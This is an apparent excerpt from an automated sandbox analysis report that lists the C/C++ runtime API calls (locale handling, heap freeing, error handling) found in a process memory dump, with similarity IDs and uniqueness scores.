                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7993
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F799D
                                                                                                                                  • int.LIBCPMT ref: 6E8F79B4
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F79EE
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7A0E
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7A1B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                  • String ID: $+xv
                                                                                                                                  • API String ID: 2204710431-1686923651
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$InformationTimeZone
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 597776487-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3033488037-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MaklocchrMaklocstr$H_prolog3_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2404127365-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Maklocstr$Maklocchr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2020259771-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 6E93CEFD
                                                                                                                                    • Part of subcall function 6E931434: HeapFree.KERNEL32(00000000,00000000,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?), ref: 6E93144A
                                                                                                                                    • Part of subcall function 6E931434: GetLastError.KERNEL32(?,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?,?), ref: 6E93145C
                                                                                                                                  • _free.LIBCMT ref: 6E93CF0F
                                                                                                                                  • _free.LIBCMT ref: 6E93CF21
                                                                                                                                  • _free.LIBCMT ref: 6E93CF33
                                                                                                                                  • _free.LIBCMT ref: 6E93CF45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Smanip$task
                                                                                                                                  • String ID: .
                                                                                                                                  • API String ID: 1925983085-248832578
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8FDF6D
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocstr.LIBCPMT ref: 6E8F681A
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocstr.LIBCPMT ref: 6E8F6837
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocstr.LIBCPMT ref: 6E8F6854
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocchr.LIBCPMT ref: 6E8F6866
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocchr.LIBCPMT ref: 6E8F6879
                                                                                                                                  • _Mpunct.LIBCPMT ref: 6E8FDFFA
                                                                                                                                  • _Mpunct.LIBCPMT ref: 6E8FE014
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                                  • String ID: $+xv
                                                                                                                                  • API String ID: 2939335142-1686923651
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct$H_prolog3
                                                                                                                                  • String ID: $+xv
                                                                                                                                  • API String ID: 4281374311-1686923651
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: task
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1384045349-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                  • _free.LIBCMT ref: 6E92F2FB
                                                                                                                                  • _free.LIBCMT ref: 6E92F331
                                                                                                                                  • SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,6E918835,6E92F53A,?,?,6E8E565E,000008BB,6E97A0D4), ref: 6E92F3F5
                                                                                                                                  • _free.LIBCMT ref: 6E92F452
                                                                                                                                  • _free.LIBCMT ref: 6E92F488
                                                                                                                                  • SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,?,?,6E918835,6E92F53A,?,?,6E8E565E,000008BB,6E97A0D4), ref: 6E92F493
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F039A
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03A6
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03B2
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03C1
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF95F
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF96B
                                                                                                                                  • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E8EF980
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF998
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2520070614-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F039A
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03A6
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03B2
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03C1
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF87F
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF88B
                                                                                                                                  • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E8EF8A0
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF8B8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2520070614-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1E36
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1E43
                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E8F1E80
                                                                                                                                    • Part of subcall function 6E8F0FAE: _Yarn.LIBCPMT ref: 6E8F0FCD
                                                                                                                                    • Part of subcall function 6E8F0FAE: _Yarn.LIBCPMT ref: 6E8F0FF1
                                                                                                                                  • std::exception::exception.LIBCMTD ref: 6E8F1EA5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_std::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2425033533-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free
                                                                                                                                  • String ID: -
                                                                                                                                  • API String ID: 269201875-2547889144
Uniqueness

Uniqueness Score: -1.00%

APIs
• __startOneArgErrorHandling.LIBCMT ref: 6E927B2D
Strings
Memory Dump Source
• Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
Uniqueness

Uniqueness Score: -1.00%